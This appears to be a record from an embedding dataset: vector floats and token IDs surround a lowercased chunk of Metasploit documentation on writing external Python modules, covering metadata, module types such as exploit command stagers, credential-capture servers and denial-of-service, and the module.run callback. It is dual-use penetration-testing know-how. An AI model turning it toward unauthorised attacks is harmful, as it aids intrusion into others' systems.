-0.6255976557731628, 0.5877309441566467, -0.5902757048606873, 0.12643970549106598, 0.2463994324207306, 0.5443968176841736, -0.449641615152359, 0.4932135045528412, 0.7057362198829651, -0.5452038049697876, -0.9967034459114075, -1.083351492881775, -0.12644629180431366, 0.03946010768413544, -0.6400700211524963, -0.6586093306541443, 0.37229591608047485, 0.09237878024578094, 0.6566141843795776, 0.48954421281814575, -0.18082240223884583, 0.09826933592557907, -0.5726112723350525, 0.08664147555828094, 0.10585154592990875, 0.2489902824163437, 0.48028066754341125, -0.7420688271522522, -0.4343041181564331, -0.575802206993103, -0.520833432674408, 0.11630292981863022, 0.06301476806402206, 1.3246097564697266, 0.01386074535548687, 0.5735877156257629, -0.28480851650238037, 0.08914856612682343, 0.7454776167869568, 0.06598139554262161, 0.10951727628707886, 0.5467151403427124, 0.1061546728014946, -0.5767761468887329, -0.2143278568983078, -0.08212912082672119, 0.41270145773887634, 0.14555594325065613, -0.07740814238786697, -0.20589490234851837, -0.030161097645759583, 0.02004753053188324, -0.33733004331588745, -0.9009454250335693, -0.2961300313472748, -0.8713235855102539, -0.10137110203504562, 0.7223085761070251, 0.055058009922504425, -0.3495459258556366, -0.18697503209114075, -0.49905160069465637, -0.6269522309303284, -0.9094278812408447, 0.23216082155704498, -0.18670181930065155, -0.15691576898097992, -0.7011857032775879, -0.5001615285873413, -0.9206007122993469, -0.43278732895851135, -0.11333934962749481, -0.2538663446903229, 0.08268372714519501, -0.9740230441093445, -0.4735375642776489, -0.4229271709918976, -0.5416163802146912, 0.47714683413505554, -0.5447353720664978, 0.34298789501190186, -0.3318873941898346, -0.4642217457294464, -0.18085412681102753, 0.37505969405174255, -0.6151714324951172, -0.00744630815461278, -0.3504692316055298, -0.004487462341785431, 0.1459546536207199, -0.344677597284317, 0.19003334641456604, -0.157617449760437, 0.5790787935256958, -0.019560230895876884, -0.12873806059360504, -0.3946380913257599, 0.45084500312805176, 0.08758775889873505, -0.4570677876472473, -0.876617431640625, -0.9445840120315552, -0.03953554481267929, 0.5306195020675659, -0.08105895668268204, 0.1951906383037567, 0.29616501927375793, 0.2653413712978363, -0.047339607030153275, -0.3511184751987457, 0.8161653280258179, 0.734060525894165, 0.4969831109046936, 0.2071789801120758, 0.4290272891521454, 0.09774989634752274, -0.27080994844436646, 0.37191280722618103, 0.42606258392333984, -0.6394068598747253, 0.22807519137859344, 0.18658800423145294, -0.07757830619812012, -0.37993353605270386, -0.15024350583553314, -0.10229523479938507, 0.3600670099258423, 0.49338269233703613, -0.3535007834434509, -0.25890952348709106, 0.385030597448349, -0.7287701368331909, -0.3173857033252716, -0.6121701598167419, -0.29020509123802185, -0.03859037160873413, -0.5112830996513367, -0.3662903904914856, -0.5023349523544312, -0.12544947862625122, -0.005862550809979439, -0.12024187296628952, 0.012188858352601528, 0.36425086855888367, -0.5333770513534546, 0.0962604358792305, 1.1849448680877686, -0.8033390045166016, -0.23538051545619965, -0.9972711801528931, 0.6860232353210449, -0.3691162168979645, -0.6021223664283752, 0.22659997642040253, 1.5544356107711792, 0.452702134847641, 0.37155652046203613, -0.6358690857887268, -0.4171154499053955, -0.040287990123033524, 0.2735479772090912, -0.1336861550807953, 0.2955329418182373, -0.7318751811981201, 0.29491639137268066, -0.7678885459899902, -0.04004456847906113, -0.27280810475349426, 0.09862769395112991, -0.43864575028419495, 0.25329089164733887, -0.19730740785598755, 0.29814037680625916, -0.576387882232666, 0.3079134523868561, 0.7819385528564453, 0.8775699734687805, -0.18541084229946136, -0.5293033123016357, -0.24360156059265137, -0.48803064227104187, 0.17509405314922333, -0.26544952392578125, 0.48089224100112915, -0.1021723523736, 0.6202862858772278, 0.6211223006248474, -0.9267072081565857, -0.42026689648628235, 0.34304243326187134, -0.2897784113883972, 0.10799914598464966, -0.4806819260120392, -0.054166510701179504, 0.3412363529205322, -0.12370391190052032, -0.34810692071914673, 0.339829683303833, 0.023139307275414467, 0.1307809203863144, 0.0072578745894134045, -0.4915107190608978, 0.66987544298172, -0.48085829615592957, 0.4480130076408386, -0.2722494900226593, -0.6933602094650269, 0.9352834224700928, 0.24539047479629517, -0.4840116500854492, 0.4917827844619751, 1.3190890550613403, 0.1303955763578415, -0.2917934060096741, 0.6036680340766907, -0.637657880783081, 0.6335698962211609, -0.11051672697067261, -0.14275583624839783, -0.47672635316848755, 0.35841381549835205, 0.20107056200504303, -0.6435407400131226, -0.7037985920906067, 0.028451303020119667, 0.40990665555000305, 0.17766520380973816, 0.02723836340010166, -0.004300760105252266, 0.3745709955692291, -0.7907514572143555, 0.5335347056388855, -0.43803876638412476, 0.546396017074585, 0.30529797077178955, -0.6573648452758789, -0.581169068813324, 1.0434391498565674, 0.6502685546875, 0.6815350651741028, 0.41598784923553467, 1.4209312200546265, 0.3032277822494507, 0.054080162197351456, 0.18947181105613708, -0.3624713718891144, 0.008549764752388, -0.0642852932214737, -0.6145524978637695, -0.41059860587120056, 0.12589411437511444, 0.11333171278238297, 0.8523254990577698, -0.19066032767295837, -0.16412104666233063, -0.7367420792579651, 0.11157676577568054, -0.20329885184764862, -0.9688785672187805, 0.6237853169441223, -0.25787657499313354, -0.698906660079956, -0.15270155668258667, 0.5814852118492126, 0.5882636308670044, 0.05818542093038559, -0.22366803884506226, -0.23010621964931488, -0.23260073363780975, -0.04607062414288521, -0.20604464411735535, 0.36008602380752563, -0.1601058393716812, -0.13950921595096588, 0.01622716709971428, -1.0611590147018433, -0.3143590986728668, 0.5253549814224243, -0.6516027450561523, -0.573836624622345, 0.554486870765686, 0.42357805371284485, 0.8298874497413635, 0.4079303741455078, -0.406433641910553, -0.17435263097286224, 0.4663097560405731, 0.582176148891449, -0.11592963337898254, 0.7978260517120361, 0.35022011399269104, -0.053517092019319534, 0.3052198886871338, 0.03891223669052124, 0.8222348690032959, -0.3136088252067566, -0.1317097395658493, 0.2505708336830139, -0.4285467565059662, -0.6625550389289856, -0.6445540189743042, 0.08232507109642029, 0.08067888766527176, 0.30941352248191833, -0.42007580399513245, -0.9411290287971497, -0.9762030839920044, -0.6235474944114685, 0.23922130465507507, 0.18501481413841248, -0.09559359401464462, -0.26185718178749084, 0.11504526436328888, 0.2935246527194977, -1.265061616897583, 4.335110187530518, 0.6988828778266907, 0.19991667568683624, -0.27065062522888184, 0.2981067895889282, 0.563179075717926, 0.8874882459640503, -0.5839369893074036, 0.5972631573677063, -0.8304567337036133, -0.19368964433670044, -0.37232592701911926, 0.23171529173851013, 0.7010446786880493, 0.2402285784482956, 0.5042939186096191, -0.8817253708839417, 0.07192743569612503, 0.2405310720205307, -0.7385117411613464, -1.1118614673614502, 0.22013260424137115, -0.6107046008110046, 0.6496474742889404, 0.4091077148914337, 0.3000336289405823, 0.07943235337734222, -0.496726393699646, -0.0162278413772583, 0.0610102154314518, 0.3908999562263489, -0.2810113728046417, 0.4737915098667145, -0.3050030767917633, -0.1824207305908203, 0.17273110151290894, -0.3368188440799713, -0.5442404747009277, -0.35216912627220154, 0.14142130315303802, 1.2252161502838135, 0.19100399315357208, -0.21068358421325684, -0.6152258515357971, 0.12678326666355133, 0.3724556565284729, -0.7973999977111816, 0.2461427003145218, 0.7818549275398254, -0.9733901619911194, 0.4226400852203369, 0.1572197824716568, 0.40829214453697205, 0.07401050627231598, -0.7635170817375183, 0.42851659655570984, 0.058590833097696304, -0.16590328514575958, -0.17274954915046692, 0.679371178150177, 0.07952913641929626, -0.2877480089664459, 0.3151914179325104, 0.15123678743839264, -0.7635247707366943, 0.4741218388080597, -0.6273333430290222, 0.9779341220855713, -0.02979455515742302, 0.38617056608200073, 0.17240911722183228, 0.0702623799443245, 0.15430890023708344, -0.5189395546913147, 0.45837897062301636, 0.407802939414978, 0.255097359418869, -0.1793123483657837, 1.0618246793746948, -0.2752213180065155, 0.07287901639938354, -0.2623458206653595, -1.0244067907333374, 0.1725092977285385, 0.5171846151351929, 0.7287793159484863, -0.08287383615970612, -0.41018882393836975, 0.10283380001783371, 0.3031967282295227, 0.2224993109703064, 0.33044710755348206, -0.23002372682094574, 0.2082395851612091, 0.3129236400127411 ]
[ 101, 3015, 18750, 14184, 2005, 18804, 13102, 4135, 12474, 24158, 2003, 2019, 2742, 1997, 2129, 2000, 4339, 1037, 18750, 11336, 2005, 18804, 13102, 4135, 4183, 7705, 2008, 3594, 1037, 18750, 18804, 13102, 4135, 4183, 3075, 2000, 10639, 2007, 7705, 3081, 1046, 3385, 1011, 1054, 15042, 2058, 2358, 8718, 1013, 2358, 26797, 2102, 1012, 6327, 18750, 14184, 2323, 2490, 18750, 4617, 1017, 1012, 1019, 1998, 10947, 1012, 18750, 1016, 1012, 1021, 2003, 2053, 2936, 2109, 2005, 6327, 14184, 1012, 7781, 2378, 20464, 12672, 2023, 2240, 2012, 1996, 2327, 1997, 2115, 11336, 1024, 1001, 999, 1013, 2149, 2099, 1013, 8026, 1013, 4372, 2615, 18750, 2509, 6132, 5397, 2115, 5371, 2003, 4417, 2004, 4654, 8586, 23056, 18750, 3075, 10760, 3075, 2747, 6753, 1037, 2261, 3853, 4455, 2008, 2064, 2022, 2109, 2000, 3189, 2592, 2000, 18804, 13102, 4135, 4183, 7705, 1012, 1996, 18804, 13102, 4135, 4183, 3075, 2064, 2022, 8209, 2046, 2115, 18750, 11336, 2011, 2164, 1996, 2206, 2240, 1024, 2013, 18804, 13102, 4135, 4183, 12324, 11336, 1996, 3295, 1997, 1996, 18804, 13102, 4135, 4183, 3075, 2003, 8073, 2794, 2000, 1996, 18750, 15069, 4044, 8023, 2077, 1996, 18750, 11336, 2003, 6472, 1012, 6235, 4426, 11368, 3022, 24759, 28100, 14184, 2421, 2592, 2055, 6048, 1997, 1996, 14184, 1010, 7604, 2000, 2060, 4216, 2007, 2592, 2055, 1996, 24728, 19666, 6906, 14680, 1010, 13271, 1997, 1996, 14184, 1010, 7047, 1010, 4385, 1012, 18750, 14184, 2342, 2000, 2421, 2023, 27425, 2592, 2004, 2092, 1012, 1996, 3252, 1997, 1996, 2951, 2003, 2714, 2000, 14184, 2517, 1999, 10090, 1012, 1996, 2206, 2003, 2019, 2742, 23561, 1997, 27425, 2592, 1024, 27425, 1027, 1063, 1005, 2171, 1005, 1024, 1005, 1026, 2171, 1028, 1005, 1010, 1005, 6412, 1005, 1024, 1005, 1005, 1005, 1026, 6412, 1028, 1005, 1005, 1005, 1010, 1005, 6048, 1005, 1024, 1031, 1005, 1026, 3166, 1028, 1005, 1010, 1005, 1026, 3166, 1028, 1005, 1033, 1010, 1005, 3058, 1005, 1024, 1005, 1061, 2100, 2100, 2100, 1011, 3461, 1011, 20315, 1005, 1010, 1005, 6105, 1005, 1024, 1005, 1026, 6105, 1028, 1005, 1010, 1005, 7604, 1005, 1024, 1031, 1063, 1005, 2828, 1005, 1024, 1005, 24471, 2140, 1005, 1010, 1005, 25416, 1005, 1024, 1005, 1026, 24471, 2140, 1028, 1005, 1065, 1010, 1063, 1005, 2828, 1005, 1024, 1005, 26226, 2063, 1005, 1010, 1005, 25416, 1005, 1024, 1005, 1061, 2100, 2100, 2100, 1011, 1001, 1005, 1065, 1010, 1063, 1005, 2828, 1005, 1024, 1005, 3968, 2497, 1005, 1010, 1005, 25416, 1005, 1024, 1005, 1001, 1005, 1065, 1010, 1063, 1005, 2828, 1005, 1024, 1005, 9875, 1005, 1010, 1005, 25416, 1005, 1024, 1005, 1026, 2171, 1028, 1005, 1065, 1033, 1010, 1005, 2828, 1005, 1024, 1005, 1026, 11336, 2828, 1028, 1005, 1010, 1005, 7047, 1005, 1024, 1063, 1005, 1026, 2171, 1028, 1005, 1024, 1063, 1005, 2828, 1005, 1024, 1005, 4769, 1005, 1010, 1005, 6412, 1005, 1024, 1005, 1026, 6412, 1028, 1005, 1010, 1005, 3223, 1005, 1024, 1026, 2995, 1013, 6270, 1028, 1010, 1005, 12398, 1005, 1024, 3904, 1065, 1010, 1005, 1026, 2171, 1028, 1005, 1024, 1063, 1005, 2828, 1005, 1024, 1005, 5164, 1005, 1010, 1005, 6412, 1005, 1024, 1005, 1026, 6412, 1028, 1005, 1010, 1005, 3223, 1005, 1024, 1026, 2995, 1013, 6270, 1028 ]
metasploit
121.txt
0
,'default': none },'< name >': {'type':'string ','description':'< description > ','required': < true / false >,'default': none } } } module typeas shown in the metadata template information, a type is also include for the module. the module type is used to select an erb template, which generates a ruby document for the module. the erb templates can be found here. the following templates are currently available : remote _ exploit _ cmd _ stager capture _ server dos single _ scanner multi _ scanner the remote _ exploit _ cmd _ stager module type is used when writing an exploit for command execution or code injection vulnerabilities and provides the command to inject into the vulnerable code based on the flavor specified for the command stager. the capture _ server module type is used when a module is designed to simulate a service to capture credentials for connecting clients. the dos module type is used when the module will send packets to a remote service that will crash the service or put it in an unusable state. the single _ scanner module type is used when creating a module to scan hosts without batching. the multi _ scanner module type is used for modules that are going to scan hosts in batches. the batch _ size option is registered in the mutli _ scanner erb template with a default of 200. optionsthe options dictionary in the metadata are the options that will be available in msfconsole when the module is loaded. the options can be required ( necessary for the module to run ) or not ( provide additional functionality ). communicationto pass the metadata information, as well as the starting function of your python module, to msfconsole, use the module. run ( ) function. the module. run ( ) function takes two arguments, the first is the metadata and the second is the callback function to use when executing the module from msfconsole. the code snippet will look like the following : def run ( args ) : # your code here pass if _ _ name _ _ = ='_ _ main _ _': module. run ( metadata, run ) when msfconsole sends a describe request to the python module, the metadata information is returned. when msfconsole sends a run request to the module, the callback function, run in this example, will be called with the arguments provided to msfconsole
[ 0.05818118527531624, -0.6588355898857117, -0.22724787890911102, 0.7156460285186768, -0.29528573155403137, 0.25945886969566345, 0.11817703396081924, 0.05488821119070053, 0.026147644966840744, 0.4037145972251892, -0.11060896515846252, -0.25486505031585693, 0.3408252000808716, -0.0935748815536499, -0.5148801803588867, 0.49863478541374207, -0.5939182043075562, -0.7420656085014343, -1.2826464176177979, -0.15372683107852936, 0.2442900538444519, -0.3540942370891571, -0.7408136129379272, -0.755455732345581, -0.7650834321975708, 0.3832494616508484, 0.8308351635932922, 0.061009954661130905, 0.3585517704486847, 1.0076134204864502, 0.33231401443481445, -0.13993729650974274, 0.17366765439510345, -0.0394979789853096, 0.08689206838607788, 0.4039716124534607, 0.4491203725337982, -0.9635277986526489, 0.20734034478664398, -0.2869212031364441, 0.6349467039108276, -0.033633891493082047, -0.20554500818252563, -0.4481929838657379, -0.45051640272140503, -0.08327322453260422, 0.7583580017089844, -0.22995010018348694, 0.9230926036834717, 0.1812049150466919, 0.6679884791374207, 0.48049840331077576, 0.1136937141418457, -0.05433109030127525, -0.41367417573928833, 0.06758059561252594, 0.014927923679351807, -0.12190616875886917, -0.19038262963294983, -0.07635235786437988, -0.6193118095397949, 0.4389345347881317, -0.07331641018390656, -0.5424210429191589, -0.15340451896190643, -0.19677139818668365, 0.0429655984044075, 0.08330140262842178, -0.0687205046415329, -0.8543585538864136, 0.3313140571117401, 0.6116706132888794, -0.7804171442985535, -0.7309244871139526, -0.8659853935241699, 0.14980240166187286, 0.1315097063779831, -0.07460299879312515, -0.6020758748054504, 0.8293485045433044, 0.16845321655273438, 0.9086538553237915, 0.3749217689037323, -0.5410786867141724, 0.2274981439113617, -0.44705930352211, 0.05660473182797432, 0.482891708612442, -0.7781946659088135, 0.12774059176445007, 0.6067379713058472, 0.7324885129928589, -0.5080470442771912, -0.5539588332176208, 0.1655135601758957, 0.4585222899913788, -0.45095884799957275, 0.19395868480205536, 0.21933236718177795, -0.5039440989494324, 1.1335808038711548, 0.8032549619674683, 0.31928199529647827, 0.1670628786087036, -0.14501135051250458, 0.6373647451400757, 0.3901718854904175, 0.04881307855248451, -0.48944929242134094, -0.18168014287948608, 0.6881103515625, -0.6429592370986938, 0.051906026899814606, -1.001156210899353, 0.07788785547018051, 0.43137073516845703, 0.34135109186172485, -0.16739316284656525, -0.43295350670814514, 0.7491527795791626, -0.3099936842918396, -0.4116850197315216, 0.6756892204284668, 0.22871403396129608, 0.15622425079345703, -0.0641370639204979, 0.39131370186805725, 0.7219733595848083, -0.8310604095458984, -0.3692939281463623, -0.2599327564239502, -0.030615514144301414, -0.18601703643798828, 0.7376781702041626, -0.24519628286361694, 0.6546251177787781, -0.21157725155353546, 0.5501046776771545, 0.6760652661323547, -0.8525736331939697, 0.28997379541397095, 0.547315776348114, 0.510748028755188, 0.7831428050994873, 0.3205350339412689, -0.24555568397045135, -0.2501167953014374, 0.006243966519832611, -0.2665376663208008, 0.3701125383377075, -0.15871459245681763, -0.35368409752845764, 0.2628583610057831, -0.10797914117574692, -0.9478822350502014, 0.10423564165830612, -0.34220612049102783, 0.5452470779418945, 0.14904844760894775, -0.009233502671122551, -0.4672465920448303, 0.6725292801856995, 0.35305655002593994, 0.5090807676315308, -0.3695266544818878, 0.259789377450943, -0.819340705871582, -0.935042142868042, -0.4315738379955292, 0.25981372594833374, 0.004185561556369066, -0.0863330289721489, 0.2520434260368347, 0.3271949589252472, 1.5080229043960571, 0.7357888221740723, 0.13302092254161835, -0.03207496553659439, 0.6157686114311218, 0.8391081690788269, -0.6656259298324585, 0.4080635607242584, 0.12446526437997818, 0.7476968169212341, 0.22320003807544708, 0.2674969732761383, -0.11274633556604385, -0.7006735801696777, -0.3052373230457306, -0.3741210997104645, 0.18057690560817719, 0.4977467358112335, -0.2732206881046295, 0.49560654163360596, 0.7846493721008301, -0.3380163013935089, -0.6067187786102295, 0.37399768829345703, -0.38402554392814636, -1.2675217390060425, -0.6104002594947815, 0.4144423007965088, 0.32718905806541443, 0.3473317325115204, -0.6014221906661987, -0.24914272129535675, 0.6169558763504028, 0.731560230255127, -0.1823834627866745, 1.2343571186065674, 1.2825289964675903, -0.6264436841011047, -0.515381395816803, 0.35083603858947754, -0.0263443011790514, -0.29473626613616943, -0.18896502256393433, -0.0007737015839666128, -0.16972234845161438, 0.3514378070831299, 0.1813463419675827, 0.5244802236557007, 0.4861440360546112, -0.05018668994307518, -0.046475548297166824, -0.7446533441543579, -0.1483166515827179, 0.6363934278488159, -0.4933503270149231, 0.08923287689685822, -0.051249291747808456, 0.6222943067550659, 0.8185237050056458, 1.1162736415863037, 0.290631502866745, -0.48602646589279175, 0.17275583744049072, 0.25754067301750183, 0.24231112003326416, -0.04619742929935455, 0.19978265464305878, 0.7828009128570557, 0.655549943447113, 0.32180655002593994, 0.3412044644355774, 0.5303934812545776, -0.18351171910762787, -0.44095322489738464, -0.026063919067382812, 0.5809013843536377, -0.04644564166665077, 0.8720788955688477, 0.0615142397582531, -0.7642363905906677, -0.24069415032863617, -0.6247945427894592, 0.23452535271644592, 0.5949718356132507, -0.5534075498580933, -0.4485664963722229, 0.1745886504650116, -0.04307923838496208, -0.7223297357559204, -0.022993914783000946, 0.05607694014906883, 0.572950541973114, 0.27305829524993896, 0.19877341389656067, -0.14563220739364624, -0.5780038237571716, -0.4463587999343872, 0.07014277577400208, -1.1924363374710083, -0.694694995880127, -0.6814977526664734, -0.1222512423992157, 0.2014133781194687, -0.4252711534500122, 0.4427136778831482, -0.15272024273872375, -0.4064871072769165, 0.2111276239156723, -0.33418336510658264, 0.6158866882324219, -0.32638218998908997, -0.14710989594459534, -0.842868983745575, 0.3362230062484741, -0.3967900276184082, 0.8077479004859924, -0.4758220613002777, -0.48413076996803284, -0.6762212514877319, -0.43965598940849304, -0.011097349226474762, -0.06606972962617874, 1.1252937316894531, -0.05508268252015114, -0.10231467336416245, 0.028468966484069824, -0.03025897964835167, 0.05907467007637024, 0.5699650049209595, 0.27975139021873474, -0.5895969271659851, 0.12846620380878448, 0.004171876236796379, -0.28748372197151184, 0.6741202473640442, 1.1306709051132202, -1.2382316589355469, 0.4838511049747467, -0.0698162168264389, 0.4438275694847107, -0.9016562700271606, 0.3726257085800171, 0.5014589428901672, -0.3515666723251343, 0.18461266160011292, -0.33803653717041016, 0.4237370491027832, -0.21123719215393066, 0.16783618927001953, -0.31255948543548584, -0.18845348060131073, 0.31873008608818054, 0.4708530604839325, -0.5242700576782227, 0.577732503414154, -0.23372749984264374, -0.00757172517478466, -0.22409889101982117, -0.20483295619487762, 0.48628246784210205, -0.13697697222232819, 0.08183880895376205, -0.408404678106308, -0.3128511607646942, 0.5222814083099365, 0.46981486678123474, -0.38081488013267517, -0.26928743720054626, 0.7048255801200867, 0.5077780485153198, -0.3234920799732208, 0.8269773125648499, 0.1881590038537979, -0.6743177175521851, -0.332995742559433, -0.5104030966758728, -0.2411012202501297, 0.2387627810239792, 0.3908424973487854, 0.45011255145072937, 0.05554106831550598, 0.9947333931922913, -0.23881664872169495, -0.46752220392227173, -0.10927678644657135, 0.2976074814796448, 0.6386495232582092, 0.2411450296640396, 0.1899021416902542, -0.09880642592906952, -0.18731975555419922, -0.3842332065105438, 0.39060017466545105, 0.9245970845222473, 0.494189590215683, -0.014567946083843708, 0.5152307748794556, -0.6111677289009094, -0.1338525265455246, 0.043488383293151855, -0.2592909038066864, -0.4790678024291992, 0.8367624282836914, 0.3294532597064972, 0.6477679014205933, -0.6166709065437317, 0.25901973247528076, -0.30196452140808105, -0.17790649831295013, 0.289462149143219, 0.3895801901817322, 0.02313956990838051, 0.14767996966838837, -0.5839903950691223, 0.12947577238082886, -0.5289484262466431, 0.06180146709084511, -0.4512765407562256, 0.35572877526283264, -0.6295313239097595, -0.5545620918273926, -0.22746321558952332, 0.8662868738174438, 1.1829673051834106, 0.6724333167076111, 0.6000220775604248, 0.8217735290527344, 0.3961196541786194, -0.6501425504684448, 0.48017042875289917, -0.6783261895179749, 0.16432298719882965, -0.2573757469654083, 1.0091021060943604, -0.3915806710720062, 0.4848802983760834, -0.5777709484100342, -0.09674349427223206, -0.37797829508781433, 0.020481761544942856, 0.30201613903045654, 0.046617720276117325, -0.999948263168335, -0.023656262084841728, 0.27027618885040283, -0.02335767075419426, -0.47384533286094666, 0.08804360777139664, 0.044426221400499344, 0.566493034362793, 0.5866886973381042, -0.5422596335411072, 0.06494425982236862, -0.38210979104042053, -0.267729789018631, 0.361891508102417, 0.12668277323246002, -0.3299812376499176, -0.5525280833244324, -0.05984548106789589, -0.3781730532646179, 0.4415552616119385, 0.44929957389831543, 0.16239464282989502, -0.1584252119064331, -0.7859026193618774, 0.11774107068777084, 0.18409694731235504, -1.1024322509765625, -0.7446216344833374, 0.1791360229253769, 0.4919775426387787, 0.2605370283126831, 0.47568124532699585, -0.9721889495849609, -0.3081842362880707, 0.534091055393219, -0.49141427874565125, 0.1122293695807457, -0.8405409455299377, 0.7067752480506897, 0.3399507999420166, -1.1290236711502075, -0.44847798347473145, -0.08704958111047745, -0.9299622178077698, -0.1602465957403183, -0.3372419774532318, 0.2768247723579407, -0.804628312587738, 0.24711158871650696, 0.8320335149765015, -0.11626932770013809, 0.1004890725016594, 0.4981600344181061, 0.6158317923545837, -0.3893902897834778, 0.42629674077033997, -0.1779928207397461, -0.0391363725066185, -0.32770392298698425, -0.9506412148475647, 0.21005529165267944, -0.12844911217689514, 0.26118507981300354, 0.011868567205965519, -0.9544336199760437, 0.45708197355270386, -0.07408405095338821, 0.4484841227531433, -0.6128236055374146, -0.8338205814361572, -0.40732964873313904, 0.6322633624076843, 0.5617433786392212, 0.14052414894104004, 0.17788511514663696, -0.0485927052795887, 0.028524747118353844, 0.12330106645822525, -0.9934664964675903, -0.8217695951461792, -0.03889528289437294, -0.34366410970687866, 0.4434376358985901, -0.011821923777461052, 0.30953678488731384, -0.25285604596138, -0.1811693161725998, 0.45574328303337097, -0.2091335952281952, 0.22125497460365295, -0.7366498112678528, -0.07049757987260818, -0.9408535361289978, 0.15065345168113708, -0.16354452073574066, 0.24061381816864014, -0.1489494889974594, 0.26155439019203186, 0.1773262321949005, 0.28126609325408936, 0.36372631788253784, -0.7712875604629517, -0.5876200795173645, 0.4743039011955261, -0.0014313897117972374, -1.0971553325653076, -0.018878180533647537, 0.43802812695503235, -0.11189479380846024, 0.13469204306602478, -0.337024062871933, -0.25575318932533264, -0.41828662157058716, -0.8974310755729675, 0.17144423723220825, 0.13276396691799164, 0.6756830811500549, -0.7036375999450684, -0.6533371210098267, -0.5602524280548096, -0.18790119886398315, 0.43561822175979614, -1.685126781463623, -0.4706909656524658, 0.10878460109233856, 0.5842650532722473, -0.2986569404602051, -0.1566532701253891, -0.22316831350326538, -0.8342159986495972, -0.3713294565677643, 0.5405611991882324, 0.13204675912857056, -0.07822921872138977, -0.1626654416322708, 0.12902723252773285, 0.7513336539268494, 0.029329709708690643, -0.4752941131591797, -0.10260647535324097, -0.34196680784225464, 0.2810405492782593, -0.7310458421707153, 0.09797336161136627, -0.45820608735084534, 0.7661459445953369, -0.054934486746788025, 0.4016696810722351, 0.480276495218277, -0.31838276982307434, 0.0923394113779068, 0.5981354117393494, 0.8449555039405823, -0.40400198101997375, -0.4771411418914795, -0.2846977114677429, 0.7894325256347656, 0.25607800483703613, -0.599632978439331, -0.35435035824775696, 0.15370267629623413, -0.4617711305618286, -1.0004819631576538, 0.6772769093513489, 0.12913307547569275, -0.2976650297641754, 0.7435227632522583, 0.5039303302764893, 1.1139382123947144, -0.5301645398139954, 0.33566176891326904, 0.8146997094154358, 0.28548797965049744, -0.2549924850463867, -0.77558833360672, 0.1638648509979248, 0.6310321688652039, 0.3524954915046692, 0.25518879294395447, -0.4682011008262634, -0.4949073791503906, 0.2528769373893738, -0.5093793869018555, -0.1730571687221527, -0.555540144443512, -0.4374663829803467, 0.05811695381999016, -0.19127775728702545, 0.6821525692939758, -0.12363716959953308, -1.2932968139648438, -0.5859327912330627, 0.010119305923581123, -0.075093112885952, 0.09971798211336136, 0.22236846387386322, 0.1767950803041458, 0.9133241176605225, -1.1831952333450317, 0.05316658318042755, -0.10627520829439163, -0.20366589725017548, 0.45951029658317566, 0.23913484811782837, -0.3981788456439972, 0.9726142883300781, -0.0640844777226448, -0.5010980367660522, -0.5707935690879822, -0.7440763711929321, -0.09840724617242813, -0.1283411681652069, -0.5002903342247009, -0.4111045300960541, 0.4221353828907013, 0.6387205719947815, -0.03853444382548332, 0.6685020327568054, 0.21954244375228882, 0.19737328588962555, -0.8952885270118713, -0.2517715394496918, -0.2384728640317917, 0.07745129615068436, 0.3404131829738617, -0.922497570514679, -0.6835075616836548, -0.8371549844741821, -0.1453743577003479, 0.45011040568351746, -0.35333192348480225, 0.8784189224243164, 0.2949175536632538, 0.21946831047534943, -0.1467304229736328, 0.0766485258936882, 0.6808237433433533, 0.05397806316614151, 0.04075794294476509, 1.0024157762527466, 0.3032062351703644, -0.666049599647522, -0.6508733034133911, 0.32932519912719727, 0.52754145860672, 0.10845953971147537, 0.4366212487220764, -0.21115942299365997, -0.005876974202692509, 0.16914142668247223, -0.3126644492149353, -0.9510359764099121, -0.8399987816810608, -1.020059585571289, 0.032800689339637756, 0.17051826417446136, 0.009265080094337463, -0.12109655886888504, 0.25509247183799744, -0.38039156794548035, -0.4738081693649292, -0.9071215391159058, 0.36477139592170715, 0.1772705763578415, 0.0775621309876442, -0.5269191861152649, 0.2812362611293793, -0.9604232907295227, -0.6487487554550171, -0.6093858480453491, -0.11772674322128296, -0.39025765657424927, -0.30956199765205383, -0.44554880261421204, -0.15959002077579498, -0.12176802009344101, 0.4757215678691864, -0.7284075021743774, 0.38687625527381897, -0.29906389117240906, -0.9381266832351685, 0.21127751469612122, 0.8700387477874756, -0.343488484621048, 0.5394104719161987, 0.4296070635318756, 0.09266531467437744, 0.5245670080184937, -0.6251482963562012, -0.12987878918647766, 0.17516395449638367, -0.2877568006515503, 0.5246706008911133, 0.1039474755525589, -0.7861077785491943, 0.4042420983314514, 0.037909865379333496, -0.7930607199668884, -0.10900705307722092, -0.8345641493797302, 0.07949304580688477, 0.23750720918178558, -0.041123926639556885, -0.30185526609420776, 0.38668587803840637, 0.6739595532417297, 0.5029039978981018, -0.7032436728477478, 0.6382600665092468, 0.35414519906044006, 0.2777211368083954, -0.06339453160762787, 0.5461722016334534, 0.034234967082738876, -0.17274990677833557, 0.27005186676979065, -0.08723597973585129, -0.8412787914276123, 0.6246793866157532, 0.10256151109933853, 0.22400406002998352, -0.1266922503709793, -0.6993620991706848, 0.17020170390605927, -0.01270968932658434, 0.2754596471786499, 0.018085328862071037, 0.6619179844856262, -0.7301535606384277, -0.5615492463111877, 0.006486172322183847, -0.8797164559364319, 0.28757598996162415, 0.4171258807182312, -0.28768637776374817, -0.4432545006275177, -0.14438065886497498, -0.30915477871894836, -0.1973891705274582, -0.33908265829086304, 0.18112707138061523, 0.4918394088745117, 0.31961947679519653, -0.27997055649757385, 1.351988434791565, -0.745568573474884, -0.5141938328742981, -0.11408709734678268, 0.42614808678627014, -0.9904721975326538, -0.9187485575675964, 0.3655557930469513, 0.7791164517402649, 0.30039292573928833, 0.0671902745962143, -0.4086671471595764, -0.42450764775276184, 0.023772066459059715, 0.24337536096572876, -0.11696021258831024, -0.4316885471343994, -0.2441406100988388, 0.5105268955230713, -0.6238906979560852, 0.04501989111304283, -0.09401969611644745, 0.1656056046485901, 0.09706961363554001, -0.26047882437705994, -0.5041715502738953, 0.6219974160194397, -0.47291457653045654, 0.0747729241847992, 0.6553835868835449, 0.6886349320411682, 0.5991369485855103, -0.5264312028884888, -0.2553088665008545, -0.666945219039917, 0.32836800813674927, 0.1322239190340042, 0.58722984790802, 0.05933089554309845, 0.8500734567642212, 0.5663061738014221, -0.8254035115242004, -0.7690446376800537, 0.3012513220310211, 0.19219240546226501, 0.2249155044555664, 0.19557178020477295, -0.14585617184638977, -0.020760679617524147, -0.14176064729690552, 0.012065073475241661, 0.7064808011054993, 0.25842568278312683, 0.46692371368408203, -0.09079674631357193, -0.3217117488384247, 0.4728713631629944, 0.11675933748483658, 0.22840142250061035, -0.10026031732559204, -0.4888007640838623, 0.2621276080608368, -0.12369705736637115, -0.3649672865867615, 0.6385199427604675, 